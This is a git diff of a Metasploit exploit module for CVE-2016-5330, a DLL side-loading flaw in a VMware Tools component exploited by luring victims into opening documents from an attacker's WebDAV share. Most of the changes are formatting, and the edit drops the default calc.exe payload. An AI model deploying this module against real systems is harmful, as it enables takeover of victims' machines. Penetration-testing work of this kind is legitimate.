diff --git a/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb b/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb index 09934ae6eb..f35be546c2 100644 --- a/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb +++ b/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb @@ -1,4 +1,3 @@ -# Based on WebDAV Application DLL Hijacker module require 'msf/core' class MetasploitModule < Msf::Exploit::Remote @@ -9,8 +8,8 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector', - 'Description' => %q{ + 'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector', + 'Description' => %q{ A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector, a component of VMware Tools. This issue can be exploited by luring a victim into opening a document from the attacker's share. An attacker can exploit this issue to @@ -18,9 +17,9 @@ class MetasploitModule < Msf::Exploit::Remote result in the attacker taking complete control of the affected system. If the WebDAV Mini-Redirector is enabled, it is possible to exploit this issue over the internet. }, - 'Author' => 'Yorick Koster', - 'License' => MSF_LICENSE, - 'References' => + 'Author' => 'Yorick Koster', + 'License' => MSF_LICENSE, + 'References' => [ ['CVE', '2016-5330'], ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'], @@ -28,35 +27,33 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread', - 'PAYLOAD' => 'windows/exec', - 'CMD' => 'C:\\Windows\\System32\\calc.exe', + 'EXITFUNC' => 'thread' }, - 'Payload' => { 'Space' => 2048, }, - 'Platform' => 'win', - 'Targets' => + 'Payload' => { 'Space' => 2048, }, + 'Platform' => 'win', + 'Targets' => [ - [ 'Windows x64', {'Arch' => ARCH_X64,} ], - [ 'Windows x86', {'Arch' => ARCH_X86,} ], + [ 'Windows x64', {'Arch' => ARCH_X86_64,} ], + [ 'Windows x86', {'Arch' => ARCH_X86,} ] ], - 'Privileged' => false, + 'Privileged' => false, 'DisclosureDate' => 'Aug 5 2016', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0)) register_options( [ - OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]), - OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]), - OptString.new('BASENAME', [ true, "The base name for the docx file", "Document1" ]), - OptString.new('SHARENAME', [ true, "The name of the top-level share", "documents" ]), + OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]), + OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]), + OptString.new('BASENAME', [ true, "The base name for the docx file", "Document1" ]), + OptString.new('SHARENAME', [ true, "The name of the top-level share", "documents" ]) ], self.class) - deregister_options('SSL', 'SSLVersion', 'SSLCert') # no SSL + # no SSL + deregister_options('SSL', 'SSLVersion', 'SSLCert') end def on_request_uri(cli, request) - case request.method when 'OPTIONS' process_options(cli, request)